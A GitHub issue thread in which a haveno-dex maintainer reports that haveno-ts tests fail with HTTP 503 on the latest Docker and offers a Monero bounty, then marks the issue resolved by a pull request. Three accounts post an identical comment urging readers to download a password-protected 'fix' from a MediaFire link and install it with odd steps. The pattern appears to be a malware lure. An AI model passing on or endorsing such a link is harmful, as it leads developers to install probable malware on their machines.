### ISSUE TITLE
Update to the latest version of Docker [2 XMR]

### ISSUE THREAD

**Issue by woodser** [haveno-dex/haveno#1234]
Running the [haveno-ts](https://github.com/haveno-dex/haveno-ts) tests with the latest version of docker fails with the error: Http response at 400 or 500 level, http status code: 503.

The issue is resolved by using an earlier version of docker, [4.26.1](https://docs.docker.com/desktop/release-notes/#4261).

This issue requests updating to the latest version of docker.

This bounty is shared with the issue on the haveno-ts repo: https://github.com/haveno-dex/haveno-ts/issues/308

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by woodser** [comment]
Resolved by @mainnet-pat in https://github.com/haveno-dex/haveno-ts/pull/315, by updating the instructions to use envoy separately from docker and adding local envoy config.
